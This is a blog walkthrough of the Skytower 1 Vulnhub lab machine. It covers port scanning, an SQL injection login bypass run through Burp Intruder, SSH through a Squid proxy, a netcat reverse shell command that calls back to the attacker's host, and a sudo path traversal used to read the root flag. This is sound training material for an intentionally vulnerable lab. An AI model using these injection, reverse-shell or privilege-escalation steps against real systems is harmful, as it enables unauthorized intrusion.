Skytower 1 Vulnhub Machine Walkthrough

Today, Lets work on the Skytower 1 Vulnhub Machine.

Lets find the IP first.

[email protected]:~# nmap -sn 192.168.18.0/24
Nmap scan report for 192.168.18.94
Host is up (0.0086s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So, our IP is 192.168.18.94. Lets do a simple port scan.

[email protected]:~# nmap -O -sV 192.168.18.94

There is. web server running on port 80. Lets have a look.

A login page, Lets try SQL Injection.

We can use Burpsuite for this. Download a list of payloads to be checked from here.

https://github.com/melbinkm/SQL-Injection-Payloads/blob/master/sqli_auth.list

Now lets capture the request in Burp

Then, Right click and send to Intruder.

Set attack type to ‘pitchfork‘ and make sure that the email and password fields are selected.

Now, Go to payloads and load the payload list we downloaded to first and second payloads.

and click Start Attack.

When the attack goes on, we can notice the response length of some requests are 231 and some are 1838. The ones with 1838 are the ones we want. They are successful logins.

Here lets try '-' as email and password.

and, we’re in!

We have the SSH login credentials now. Lets try logging in.

Its not getting connected. But remember, we have a Squid proxy opened on port 3128.

Lets try connecting through it.

add the following line to /etc/proxychains.conf

http 192.168.18.94 3128

Now, lets try connecting to the machine.

We logged in to the server, and logged out automatically. lets try running a command upon login.

[email protected]:~# proxychains ssh -t [email protected] ls -la

Ok, So our command is working. Still we are getting logged out. Lets try to get a reverse shell through this.

First check if netcat is present there.

Yes, Now lets spawn a reverse shell.

[email protected]:~# nc -nlvp 4444
listening on [any] 4444 ...

We have executed the command and got a reverse shell in our kali machine.

We are in, now lets have a look at /etc/passwd

There are two more users, sara and william.

Lets try to find out the passwords of sara and william too and log in.

username: [email protected]
password: '-'

username: [email protected]
password: '-'

We got the password of sara. Lets try logging in.

[email protected]:~# proxychains ssh -t [email protected] nc 192.168.18.92 4444 -e /bin/bash

We got access to sara’s account.

run sudo -l ro view sara’s sudo permissions.

So, Sara can use cat and ls in /accounts/ directory with root permissions.

According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login

we can execute a script upon ssh login if we place that in .bashrc file.

Lets have a look.

cat .bashrc

Lets try removing this and login again.

rm .bashrc

Logged in.

Now we can use sudo ls /accounts/ on the machine with root permissions.

What about sudo ls /accounts/../ ? Lets try

Using this method, we can go back to /root directory and find a flag.txt file there.

Now use cat to read the file.

sudo cat /accounts/../root/flag.txt

We got the root password now. Lets try to be root using su command.

We are root!

Published by

Melbin Mathew

I'm Melbin Mathew from Kerala, India. Infosec enthusiast, interested in Bug Hunting, Web App Pentesting and and Blogging. Love learning something new every day. Drop a mail to connect. LinkedIn | Github | Twitter Contact: melbin [-at-] melbin.in

Leave a Reply

Your email address will not be published. Required fields are marked *